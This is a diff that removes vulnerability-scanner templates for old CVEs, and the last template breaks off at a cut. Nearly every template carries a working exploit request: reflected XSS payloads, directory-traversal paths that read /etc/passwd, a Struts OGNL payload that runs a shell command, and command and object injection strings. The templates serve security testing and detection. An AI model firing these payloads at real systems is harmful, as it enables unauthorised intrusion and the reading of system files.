- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
|
||||
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
|
||||
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -1,30 +0,0 @@
|
|||
id: CVE-2004-0519
|
||||
|
||||
info:
|
||||
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
|
||||
reference: https://www.exploit-db.com/exploits/24068
|
||||
tags: xss,squirrelmail,cve2004,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -1,25 +0,0 @@
|
|||
id: CVE-2005-2428
|
||||
info:
|
||||
name: CVE-2005-2428
|
||||
author: CasperGN
|
||||
severity: medium
|
||||
tags: cve,cve2005
|
||||
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
|
||||
reference:
|
||||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
|
||||
- https://www.exploit-db.com/exploits/39495
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/names.nsf/People?OpenView"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
name: domino-username
|
||||
regex:
|
||||
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
part: body
|
|
@ -1,26 +0,0 @@
|
|||
id: CVE-2005-4385
|
||||
|
||||
info:
|
||||
name: Cofax <= 2.0RC3 XSS
|
||||
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
|
||||
reference:
|
||||
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cofax,xss,cve,cve2005
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'>\"</script><script>alert(document.domain)</script>"
|
|
@ -1,30 +0,0 @@
|
|||
id: CVE-2006-1681
|
||||
|
||||
info:
|
||||
name: Cherokee HTTPD <=0.5 XSS
|
||||
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
|
||||
reference:
|
||||
- https://www.securityfocus.com/bid/17408
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cherokee,httpd,xss,cve,cve2006
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
@ -1,25 +0,0 @@
|
|||
id: CVE-2006-2842
|
||||
|
||||
info:
|
||||
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
|
||||
author: dhiyaneshDk
|
||||
severity: high
|
||||
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
|
||||
reference: https://www.exploit-db.com/exploits/27948
|
||||
tags: cve2006,lfi,squirrelmail,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,29 +0,0 @@
|
|||
id: CVE-2007-0885
|
||||
|
||||
info:
|
||||
name: Rainbow.Zen Jira XSS
|
||||
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cve,cve2007,jira,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2007-4504
|
||||
|
||||
info:
|
||||
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/4307
|
||||
- https://www.cvedetails.com/cve/CVE-2007-4504
|
||||
tags: cve,cve2007,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,30 +0,0 @@
|
|||
id: CVE-2007-4556
|
||||
|
||||
info:
|
||||
name: Apache Struts2 S2-001 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
|
||||
reference: https://www.guildhab.top/?p=2326
|
||||
tags: cve,cve2007,apache,rce,struts
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/login.action"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2007-5728
|
||||
|
||||
info:
|
||||
name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
|
||||
tags: cve,cve2007,xss,pgadmin,phppgadmin
|
||||
reference: https://www.exploit-db.com/exploits/30090
|
||||
metadata:
|
||||
shodan-query: 'http.title:"phpPgAdmin"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert("document.domain")</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -1,29 +0,0 @@
|
|||
id: CVE-2008-2398
|
||||
|
||||
info:
|
||||
name: AppServ Open Project 2.5.10 and earlier XSS
|
||||
author: unstabl3
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
|
||||
reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
||||
tags: cve,cve2008,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=confirm('xss')>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -1,25 +0,0 @@
|
|||
id: CVE-2008-2650
|
||||
info:
|
||||
name: CMSimple 3.1 - Local File Inclusion
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
|
||||
reference: https://www.exploit-db.com/exploits/5700
|
||||
tags: cve,cve2008,lfi
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-4668
|
||||
|
||||
info:
|
||||
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6618
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4668
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-4764
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5435
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4764
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-5587
|
||||
|
||||
info:
|
||||
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
reference: https://www.exploit-db.com/exploits/7363
|
||||
tags: cve2008,lfi,phppgadmin
|
||||
metadata:
|
||||
shodan-query: 'http.title:"phpPgAdmin"'
|
||||
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-6080
|
||||
|
||||
info:
|
||||
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6809
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6080
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-6172
|
||||
|
||||
info:
|
||||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-6222
|
||||
|
||||
info:
|
||||
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6980
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6222
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2008-6668
|
||||
|
||||
info:
|
||||
name: nweb2fax <= 0.2.7 Directory Traversal
|
||||
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5856
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: nweb2fax,lfi,cve,cve2008,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -1,20 +0,0 @@
|
|||
id: CVE-2009-0545
|
||||
|
||||
info:
|
||||
name: ZeroShell <= 1.0beta11 Remote Code Execution
|
||||
author: geeknik
|
||||
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
|
||||
reference: https://www.exploit-db.com/exploits/8023
|
||||
severity: critical
|
||||
tags: cve,cve2009,zeroshell,kerbynet,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -1,28 +0,0 @@
|
|||
id: CVE-2009-0932
|
||||
|
||||
info:
|
||||
name: Horde - Horde_Image::factory driver Argument LFI
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/16154
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
|
||||
tags: cve,cve2009,horde,lfi,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2009-1151
|
||||
|
||||
info:
|
||||
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
|
||||
reference:
|
||||
- https://www.phpmyadmin.net/security/PMASA-2009-3/
|
||||
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
||||
tags: cve,cve2009,phpmyadmin,rce,deserialization
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /scripts/setup.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-1496
|
||||
|
||||
info:
|
||||
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8367
|
||||
- https://www.cvedetails.com/cve/CVE-2009-1496
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,24 +0,0 @@
|
|||
id: CVE-2009-1558
|
||||
|
||||
info:
|
||||
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||
reference: https://www.exploit-db.com/exploits/32954
|
||||
tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2009-1872
|
||||
|
||||
info:
|
||||
name: Adobe Coldfusion 8 linked XSS vulnerabilies
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
|
||||
reference:
|
||||
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
|
||||
- https://www.tenable.com/cve/CVE-2009-1872
|
||||
tags: cve,cve2009,adobe,xss,coldfusion
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-2015
|
||||
|
||||
info:
|
||||
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8898
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2015
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-2100
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8946
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2100
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-3053
|
||||
|
||||
info:
|
||||
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9564
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3053
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-3318
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_album 1.14 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
